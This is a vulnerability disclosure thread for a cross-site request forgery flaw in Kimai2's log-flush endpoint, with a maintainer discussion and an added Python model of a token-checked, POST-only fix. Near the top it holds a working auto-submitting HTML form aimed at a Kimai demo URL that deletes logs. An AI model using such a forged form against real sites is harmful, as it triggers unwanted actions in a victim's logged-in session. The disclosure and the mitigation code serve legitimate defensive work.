Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2
Nov 8th 2021
A cross-site request forgery (CSRF) vulnerability is present in the delete functionality of the doctor feature.
Proof of Concept
<script>history.pushState('', '', '/')</script>
<!-- the form has no method attribute, so it submits a GET; the endpoint accepted it without a CSRF token -->
<form action="https://demo-stable.kimai.org/de_CH/doctor/flush-log">
  <input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit();</script>
This vulnerability is capable of deleting the existing logs.
I don't understand that report; can you please explain what exactly the issue is?
Hi Kevin, it's weird actually. When I submitted this report, there was a delete icon in the logfile functionality of the doctor module, which uses the GET method and has no CSRF protection. Now it is not shown.
When I planned to write a report 2 weeks ago, the same thing happened: the delete icon was there one day and was not shown the very next day.
The delete icon flushes the application logs, which are only visible to the system administrator. You can "echo 'foo' > var/log/prod.log" to show the icon again.
OK, the flush log functionality does not have a CSRF token,
so it is possible to perform a CSRF attack on flush logs.
Valid CSRF, even though no risk factor.
Thanks for sharing @Asura-N
CVE published! 🎊
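The mitigation pattern for an endpoint like the flush-log action above, as an added example that is not Kimai's code: the Python model below puts the reported behaviour (a GET with no token clears the log) beside a hardened handler that accepts only POST, requires a per-session token that the legitimate form embeds, compares it in constant time, and uses the browser's Sec-Fetch-Site header as defence in depth. The Session, Request and LogStore classes and the run_scenarios() replay are constructed stand-ins, not Kimai's or Symfony's API; the log line is constructed sample data.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed stand-ins for what a web framework normally provides.
# None of this is Kimai's or Symfony's API; it only models the handler logic.

@dataclass
class Session:
    # Per-session CSRF secret; a page on another origin cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))

@dataclass
class Request:
    method: str
    session: Session
    form: dict = field(default_factory=dict)     # POST body parameters
    headers: dict = field(default_factory=dict)  # request headers

@dataclass
class LogStore:
    lines: list

def csrf_field(session: Session) -> str:
    """Hidden input the legitimate delete form embeds so the token is sent back."""
    return f'<input type="hidden" name="_token" value="{session.csrf_token}">'

def flush_log_vulnerable(req: Request, store: LogStore) -> int:
    """Models the reported behaviour: a plain GET with no token clears the log,
    so a form on any page the logged-in admin visits can trigger it."""
    store.lines.clear()
    return 302  # redirect back to the doctor page

def flush_log_hardened(req: Request, store: LogStore) -> int:
    """Same action with the three checks that defeat the reported CSRF."""
    # 1. State-changing actions only over POST; a GET must have no side effects.
    if req.method != "POST":
        return 405
    # 2. Defence in depth: browsers send Sec-Fetch-Site, so reject requests
    #    that are neither same-origin nor directly user-initiated ("none").
    site = req.headers.get("Sec-Fetch-Site")
    if site is not None and site not in ("same-origin", "none"):
        return 403
    # 3. The submitted token must equal the session's token; constant-time
    #    comparison so the check leaks no timing information.
    submitted = req.form.get("_token", "")
    if not hmac.compare_digest(submitted.encode(), req.session.csrf_token.encode()):
        return 403
    store.lines.clear()
    return 302

def run_scenarios() -> dict:
    """Replay the report's cross-site form against both handlers.
    Returns {name: (HTTP status, log lines remaining)}."""
    results = {}
    admin = Session()
    sample = ["[2021-11-08] app.INFO: constructed log line"]  # constructed data

    # The report's PoC: a GET form submitted from another origin, no token.
    forged = Request("GET", admin, headers={"Sec-Fetch-Site": "cross-site"})
    store = LogStore(list(sample))
    results["vulnerable_get"] = (flush_log_vulnerable(forged, store), len(store.lines))

    store = LogStore(list(sample))
    results["hardened_get"] = (flush_log_hardened(forged, store), len(store.lines))

    # A forged POST still has no access to the admin's session token.
    forged_post = Request("POST", admin, form={"_token": "guess"},
                          headers={"Sec-Fetch-Site": "cross-site"})
    results["hardened_forged_post"] = (flush_log_hardened(forged_post, store), len(store.lines))

    # The real same-origin form, carrying the token emitted by csrf_field().
    legit = Request("POST", admin, form={"_token": admin.csrf_token},
                    headers={"Sec-Fetch-Site": "same-origin"})
    results["hardened_legit_post"] = (flush_log_hardened(legit, store), len(store.lines))
    return results

if __name__ == "__main__":
    for name, (status, remaining) in run_scenarios().items():
        print(f"{name}: HTTP {status}, {remaining} log line(s) left")
```

The token check alone closes the reported issue; the POST-only rule is what makes a bare link or image tag harmless, and the Sec-Fetch-Site check catches cross-site submissions even if a token were ever leaked.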